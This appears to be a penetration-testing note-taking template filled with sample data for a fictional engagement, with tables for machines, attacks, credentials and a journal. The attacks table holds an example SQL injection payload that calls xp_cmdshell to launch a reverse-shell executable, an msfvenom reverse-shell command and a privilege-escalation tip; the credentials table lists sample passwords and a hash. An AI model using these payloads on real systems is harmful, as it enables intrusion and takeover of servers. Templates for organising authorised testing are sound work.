✏️ Overview

<aside> 🗒️ Name

Company XY pentest

</aside>

<aside> 📅 Time Frame

12 Jan 2024 - 14 Jan 2024

</aside>

<aside> 🎯 Goal

Obtain domain admin account

</aside>

<aside> 📝 Description

This template is designed to streamline note-taking during a penetration test. It is divided into four main sections: Machines, Attacks & Payloads, Credentials, and Journal. The key to using it effectively is to keep every section updated with new findings and details as the engagement progresses. You can remove this section or replace it with the complete task description. Keep in mind that this is not a Pentest Report.

</aside>

🖥️ Machines

| Name | IP | Is Pwned | Is in domain | Has AV | Has FW | Operating System | Observations | Successful Attack Vector | Open Ports | Additional Notes |
|---|---|---|---|---|---|---|---|---|---|---|
| Alpha-Node | 192.168.1.101 | | | | | Windows 10 | SMB Vulnerability, RDP Brute Force | | 135, 445, 3389 | SMB seems vulnerable to EternalBlue |
| Beta-Server | 192.168.1.102 | | | | | Ubuntu 18.04 | SSH Weak Credentials, Exposed FTP | SSH using found credentials | 22, 21, 80 | Credentials found in previous breach dump |
| Gamma-Box | 192.168.1.103 | | | | | CentOS 7 | Outdated Apache Server, Misconfigured sudo | | 80 | |

☑️ Attacks & Payloads

| Machine | Attack Vector | Prerequisites | Payload | Additional Notes |
|---|---|---|---|---|
| Alpha-Node | SQLi on /login | `msfvenom -p windows/shell_reverse_tcp`; download payload, store in temp, run it | `ProductID=1';EXEC master.dbo.xp_cmdshell "powershell C:\windows\temp\reverse.exe"; --` | Use GodPotato to escalate privileges to nt authority\system |

👥 Credentials

| Username | Hash | Password | Is domain user | Purpose | Additional Notes |
|---|---|---|---|---|---|
| admin | | password123 | | Admin login for Gamma-Box | Common password, easily guessed. |
| jdoe | | summer2024! | | SSH access to Beta-Server | Password obtained in phishing attack. |
| backup_user | 8846f7eaee8fb117ad06bdd830b7586c | | | Backup service on Alpha-Node | Long time to crack using rockyou.txt. |

📘 Journal

| Timestamp | Machine | Note |
|---|---|---|
| 12:34 | Beta-Server | Found common credentials using a previously known breach database. Gained SSH access. |